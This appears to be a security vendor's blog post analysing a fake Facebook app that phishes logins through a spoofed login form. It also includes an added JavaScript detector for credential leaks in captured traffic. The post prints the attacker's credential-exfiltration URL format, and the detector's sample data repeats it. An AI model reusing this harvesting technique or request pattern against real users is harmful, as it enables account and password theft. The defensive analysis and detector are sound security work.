Another Fake Facebook App is Here to Steal your Passwords

Created: 07 Apr 2011 08:45:19 GMT • Updated: 23 Jan 2014 18:21:42 GMT
Hardik Shah

Recently, we came across an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook:

Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app will log the user out and ask him/her to log in again:

When the user clicks on the “Login” button, it will show the login form:

When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:

http://IPRemoved/log.php?email=<email address>&pass=<password>

Standard best-practice advice is to check the browser's address bar to confirm which site you are on, but that isn’t enough in this case. The address bar shows apps.facebook.com while the login form is displayed, even though the credentials are posted to a malicious site.
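Because the address bar does not reveal the second POST, the check has to happen on the captured traffic. The following is an added example, not code from the original post: it scans recorded HTTP sessions for credential parameters sent to any host other than facebook.com. The session record shape, the parameter names beyond `email` and `pass`, and the sample hosts are assumptions.

```javascript
// Parameter names that carry credentials. "email" and "pass" come from the
// request format quoted above; the others are assumptions for this example.
const CREDENTIAL_PARAMS = new Set(["email", "pass", "password", "passwd", "pwd"]);
// Domains the real login form is expected to post to (assumption).
const TRUSTED_SUFFIXES = ["facebook.com"];

function isTrustedHost(host) {
  const h = host.toLowerCase();
  return TRUSTED_SUFFIXES.some((s) => h === s || h.endsWith("." + s));
}

// Collect credential parameter names from the query string and a form-encoded body.
function credentialParams(url, body) {
  const names = new Set();
  for (const source of [url.searchParams, new URLSearchParams(body || "")]) {
    for (const [name, value] of source) {
      const key = name.toLowerCase();
      if (value !== "" && CREDENTIAL_PARAMS.has(key)) names.add(key);
    }
  }
  return [...names].sort();
}

// Flag sessions that send credential parameters to a host outside the trusted set.
// Only parameter names are reported; the values are never copied into findings.
function findCredentialLeaks(sessions) {
  const findings = [];
  for (const s of sessions) {
    let url;
    try { url = new URL(s.url); } catch { continue; } // skip unparsable entries
    const params = credentialParams(url, s.body);
    if (params.length === 0 || isTrustedHost(url.hostname)) continue;
    findings.push({ host: url.hostname, path: url.pathname, params, overHttp: url.protocol === "http:" });
  }
  return findings;
}

// Constructed sample capture. 203.0.113.10 is a documentation address standing
// in for the removed IP; the last entry is a look-alike host, not from the post.
const SAMPLE_SESSIONS = [
  { method: "POST", url: "https://www.facebook.com/login.php", body: "email=user%40example.com&pass=hunter2" },
  { method: "POST", url: "http://203.0.113.10/log.php?email=user%40example.com&pass=hunter2", body: "" },
  { method: "GET", url: "http://203.0.113.10/fb2.js", body: "" },
  { method: "GET", url: "https://facebook.com.example.net/?email=a%40b.c", body: "" },
];

console.log(findCredentialLeaks(SAMPLE_SESSIONS));
```

The host comparison matches on a dot boundary, so a name that merely contains "facebook.com" is still reported.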

The following are the Fiddler logs that show email addresses and passwords being posted to the malicious server:

The bogus app also "likes" the link in an automatic post, which will be displayed on the user's profile:

We have also observed a similar attack hosted on the same IP address. It displays a different message: “Video: This is the best April Fools' prank ever!” This attack also employs the same technique, as mentioned above, in order to steal usernames and passwords for users’ Facebook accounts:

The good news is that Symantec customers are protected from this attack. We at Symantec urge readers to install all security patches and definitions regularly.